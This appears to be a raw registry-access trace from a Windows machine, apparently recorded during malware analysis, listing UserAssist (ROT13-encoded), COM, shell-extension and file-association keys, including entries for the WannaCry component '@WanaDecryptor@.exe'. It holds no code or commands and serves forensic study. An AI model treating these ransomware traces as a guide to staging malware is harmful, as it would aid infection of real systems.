HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\NhgbUbgxrl\NhgbUbgxrl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\NhgbUbgxrl\Pbzcvyre\Nux2Rkr.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{39SP1O9O-10P4-2R03-02N4-Q6NPNS02363S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{RQ1O95O9-4031-Q3P3-673R-568RPON26559}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Wnin\wer1.8.0_351\ova\wninpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.QNGNONFRPBZCNER.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.FRGYNAT.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFBHP.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BpChoZte.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.FCERNQFURRGPBZCNER.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.zfbgq.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.zfbri.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{R4Q020S2-S887-O037-0792-4O4999S5SRS1}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba38\clguba.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7061SQ6Q-62S3-S0S7-86P9-Q7QR56QP59SS}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{O80459S0-73N2-1091-646R-NO6P9SR848QN}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CD Burning\Drives
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_CURRENT_USER\Software\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\Favorites
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesResolve
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace\DelegateFolders\{ed50fc29-b964-48a9-afb3-15ebb9b97f36}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PrintersAndFaxes\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\PrintersAndFaxes\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\PrintersAndFaxes\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\ShellFolder
HKEY_CLASSES_ROOT\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\InProcServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{ed50fc29-b964-48a9-afb3-15ebb9b97f36}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{ED50FC29-B964-48A9-AFB3-15EBB9B97F36}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CLASSES_ROOT\.bmp
HKEY_CURRENT_USER\Software\Classes\.bmp
HKEY_CLASSES_ROOT\.bmp\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp\UserChoice
HKEY_CLASSES_ROOT\Paint.Picture
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\image
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\Paint.Picture
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\DocObject
HKEY_CURRENT_USER\Software\Classes\SystemFileAssociations\.bmp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\DocObject
HKEY_CURRENT_USER\Software\Classes\SystemFileAssociations\image
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\Clsid
HKEY_CURRENT_USER\Software\Classes\Paint.Picture\CLSID
HKEY_CLASSES_ROOT\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\Implemented Categories\{00021490-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKEY_CLASSES_ROOT\CLSID\{A38B883C-1682-497E-97B0-0A3A9E801682}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{A38B883C-1682-497E-97B0-0A3A9E801682}
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts
HKEY_CURRENT_USER\Software\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\AuthenticationURLs
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\Tenants
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ScopeIdToMountPointPathCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ThumbnailCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\@WanaDecryptor@.exe
HKEY_CURRENT_USER\Software\Classes\Paint.Picture\DefaultIcon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_CURRENT_USER\Software\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_CLASSES_ROOT\Applications\@WanaDecryptor@.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_CURRENT_USER\Software\Classes\SystemFileAssociations\image\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_CLASSES_ROOT\CLSID\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}
HKEY_CURRENT_USER\Software\Classes\CLSID\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}
HKEY_CLASSES_ROOT\CLSID\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}\InProcServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C7657C4A-9F68-40FA-A4DF-96BC08EB3551}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{c7657c4a-9f68-40fa-a4df-96bc08eb3551}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\PhotoMetadataHandler.dll
HKEY_CURRENT_USER\Software\Classes\Interface\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E357FCCD-A995-4576-B01F-234630154E96}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E357FCCD-A995-4576-B01F-234630154E96}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{B824B49D-22AC-4161-AC8A-9916E8FA3F7F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B824B49D-22AC-4161-AC8A-9916E8FA3F7F}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{B824B49D-22AC-4161-AC8A-9916E8FA3F7F}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{0000000C-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CLASSES_ROOT\CLSID\{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_CLASSES_ROOT\.exe
HKEY_CURRENT_USER\Software\Classes\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_CURRENT_USER\Software\Classes\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_CURRENT_USER\Software\Classes\*\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{E357FCCD-A995-4576-B01F-234630154E96}
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{85CB6900-4D95-11CF-960C-0080C7F4EE85}\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E2-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{000214E2-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E2-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{00000114-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000114-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{00000114-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E3-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{000214E3-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{000214E3-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win64
HKEY_CURRENT_USER\Software\Classes\TypeLib\{50A7E9B0-70EF-11D1-B75A-00A0C90564FE}\1.0\0\win64
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\Forward
HKEY_CURRENT_USER\Software\Classes\Interface\{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}\TypeLib
